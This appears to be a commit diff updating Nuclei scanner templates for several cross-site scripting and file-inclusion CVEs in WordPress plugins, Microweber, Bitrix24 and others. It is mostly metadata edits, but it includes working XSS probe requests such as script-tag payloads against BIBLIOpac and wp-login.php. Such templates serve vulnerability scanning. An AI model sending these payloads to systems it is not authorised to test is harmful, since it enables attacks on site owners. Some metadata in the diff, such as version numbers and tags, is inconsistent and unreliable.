Up PoCs 2022-09-17

Author: hktalent

config/nuclei-templates/cves/2008/CVE-2008-1059.yaml

@@ -12,10 +12,10 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
     - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
-    cve-id: CVE-2008-1061
-    cwe-id: CWE-22
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2008-1059
+    cwe-id: CWE-79
   tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
 
 requests:

config/nuclei-templates/cves/2008/CVE-2008-1061.yaml

@@ -3,7 +3,7 @@ id: CVE-2008-1061
 info:
   name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
   author: dhiyaneshDK
-  severity: medium
+  severity: high
   description: |
     WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
   reference:
@@ -12,7 +12,10 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
     - http://secunia.com/advisories/29099
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
     cve-id: CVE-2008-1061
+    cwe-id: CWE-79
   tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
 
 requests:

config/nuclei-templates/cves/2014/CVE-2014-8676.yaml

@@ -1,16 +1,16 @@
 id: CVE-2014-8676
 
 info:
-  name: Simple Online Planning Tool 1.3.2 - Directory Traversal
+  name: Simple Online Planning Tool <1.3.2 - Local File Inclusion
   author: 0x_Akoko
   severity: medium
   description: |
-    Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
+    SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.
   reference:
     - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
     - https://www.exploit-db.com/exploits/37604/
     - http://seclists.org/fulldisclosure/2015/Jul/44
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
@@ -32,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/09

config/nuclei-templates/cves/2018/CVE-2018-16139.yaml

@@ -1,42 +1,43 @@
-id: CVE-2018-16139
-
-info:
-  name: BIBLIOsoft BIBLIOpac 2008 - Cross Site Scripting
-  author: atomiczsec
-  severity: medium
-  description: |
-    Cross-site scripting (XSS) vulnerability in BIBLIOsoft BIBLIOpac 2008 allows remote attackers to inject arbitrary web script or HTML via the db or action parameter to to bin/wxis.exe/bibliopac/.
-  reference:
-    - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-16139
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16139
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
-    cve-id: CVE-2018-16139
-    cwe-id: CWE-79
-  metadata:
-    verified: true
-    shodan-query: title:"Bibliopac"
-  tags: cve,cve2018,xss,bibliopac,bibliosoft
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"><script>prompt(document.domain)</script>.xrf'
-
-      - type: word
-        part: header
-        words:
-          - "text/html"
-
-      - type: status
-        status:
-          - 200
+id: CVE-2018-16139
+
+info:
+  name: BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting
+  author: atomiczsec
+  severity: medium
+  description: |
+    BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.
+  reference:
+    - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16139
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-16139
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: title:"Bibliopac"
+    verified: "true"
+  tags: cve,cve2018,xss,bibliopac,bibliosoft
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>prompt(document.domain)</script>.xrf'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/14

config/nuclei-templates/cves/2020/CVE-2020-13258.yaml

@@ -1,14 +1,14 @@
 id: CVE-2020-13258
 
 info:
-  name: Contentful - Cross-Site Scripting
+  name: Contentful <=2020-05-21 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    Contentful through 2020-05-21 for Python allows reflected XSS, as demonstrated by the api parameter to the-example-app.py.
+    Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py.
   reference:
     - https://github.com/contentful/the-example-app.py/issues/44
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13258
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/14

config/nuclei-templates/cves/2020/CVE-2020-13483.yaml

@@ -1,13 +1,14 @@
 id: CVE-2020-13483
 
 info:
-  name: Bitrix24 through 20.0.0 allows Cross-Site Scripting
+  name: Bitrix24 <=20.0.0 - Cross-Site Scripting
   author: pikpikcu,3th1c_yuk1
   severity: medium
-  description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
+  description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
   reference:
     - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
     - https://twitter.com/brutelogic/status/1483073170827628547
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13483
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -40,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs 2022/09/14

config/nuclei-templates/cves/2021/CVE-2021-24214.yaml

@@ -0,0 +1,41 @@
+id: CVE-2021-24214
+info:
+  name: OpenID Connect Generic Client 3.8.0-3.8.1 - Reflected Cross Site Scripting (XSS) via Login Error
+  author: tess
+  severity: medium
+  description: The OpenID Connect Generic Client WordPress plugin 3.8.0 and 3.8.1 did not sanitise the login error when output back in the login form, leading to a reflected Cross-Site Scripting issue. This issue does not require authentication and can be exploited with the default configuration.
+  reference:
+    - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24214
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-24214
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+  tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,wp,openid
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ERROR (<script>alert(document.domain)</script>):'
+          - 'Login with OpenID Connect'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2021/CVE-2021-24276.yaml

@@ -1,14 +1,14 @@
 id: CVE-2021-24276
 
 info:
-  name: Contact Form by Supsystic < 1.7.15 - Cross-Site Scripting
+  name: WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+  description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.
   reference:
     - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24276
     - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24276
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/14

config/nuclei-templates/cves/2021/CVE-2021-24746.yaml

@@ -1,10 +1,10 @@
 id: CVE-2021-24746
 
 info:
-  name: WordPress Sassy Social Share Plugin - Cross-Site Scripting
+  name: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting
   author: Supras
   severity: medium
-  description: WP plugin Sassy Social Share < 3.3.40 - Reflected Cross-Site Scripting
+  description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability.
   reference:
     - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24746
@@ -49,3 +49,5 @@ requests:
         group: 1
         regex:
           - '"slug":"([_a-z-A-Z0-9]+)",'
+
+# Enhanced by cs 2022/09/14

config/nuclei-templates/cves/2021/CVE-2021-46069.yaml

@@ -53,4 +53,4 @@ requests:
           - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
         condition: and
 
-# Enhanced by mp 09/09/2022
+# Enhanced by mp 2022/09/09

config/nuclei-templates/cves/2021/CVE-2021-46073.yaml

@@ -53,4 +53,4 @@ requests:
           - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
         condition: and
 
-# Enhanced by mp 09/09/2022
+# Enhanced by mp 2022/09/09

config/nuclei-templates/cves/2022/CVE-2022-0776.yaml

@@ -1,15 +1,19 @@
 id: CVE-2022-0776
 
 info:
-  name: RevealJS postMessage Cross-Site Scripting
+  name: RevealJS postMessage <4.3.0 - Cross-Site Scripting
   author: LogicalHunter
-  severity: medium
-  description: Cross-site Scripting (XSS) - DOM in GitHub repository hakimel/reveal.js prior to 4.3.0.
+  severity: high
+  description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.
   reference:
     - https://hackerone.com/reports/691977
     - https://github.com/hakimel/reveal.js/pull/3137
     - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0776
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
     cve-id: CVE-2022-0776
   tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs
 
@@ -32,3 +36,5 @@ headless:
         part: extract
         words:
           - "true"
+
+# Enhanced by mp on 2022/09/14

config/nuclei-templates/cves/2022/CVE-2022-0928.yaml

@@ -1,11 +1,11 @@
 id: CVE-2022-0928
 
 info:
-  name: Microweber - Cross-Site Scripting
+  name: Microweber <1.2.12 - Stored Cross-Site Scripting
   author: amit-jd
   severity: medium
   description: |
-    Cross-site Scripting (XSS) discovered in microweber prior to 1.2.12. Type parameter in the body of POST request triggered by add/edit tax in microweb are vulnerable to stored XSS.
+    Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.
   reference:
     - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd
     - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a
@@ -53,3 +53,5 @@ requests:
           - 'contains(all_headers_3,"text/html")'
           - 'status_code==200'
         condition: and
+
+# Enhanced by mp on 2022/09/14

config/nuclei-templates/cves/2022/CVE-2022-0954.yaml

@@ -1,11 +1,11 @@
 id: CVE-2022-0954
 
 info:
-  name: Microweber - Cross-Site Scripting
+  name: Microweber <1.2.11 - Stored Cross-Site Scripting
   author: amit-jd
   severity: medium
   description: |
-    Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
+    Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.
   reference:
     - https://github.com/advisories/GHSA-8c76-mxv5-w4g8
     - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
@@ -55,3 +55,5 @@ requests:
           - 'contains(all_headers_3,"text/html")'
           - 'status_code_3==200'
         condition: and
+
+# Enhanced by mp on 2022/09/14

config/nuclei-templates/cves/2022/CVE-2022-0963.yaml

@@ -1,16 +1,16 @@
 id: CVE-2022-0963
 
 info:
-  name: Microweber > 1.2.12 - Cross-Site Scripting
+  name: Microweber <1.2.12 - Stored Cross-Site Scripting
   author: amit-jd
   severity: medium
   description: |
-    Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack.
+    Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,.
   reference:
     - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/
     - https://github.com/advisories/GHSA-q3x2-jvp3-wj78
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
     - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
@@ -67,3 +67,5 @@ requests:
           - 'status_code_3==200'
           - 'contains(body_2,"bytes_uploaded")'
         condition: and
+
+# Enhanced by mp on 2022/09/14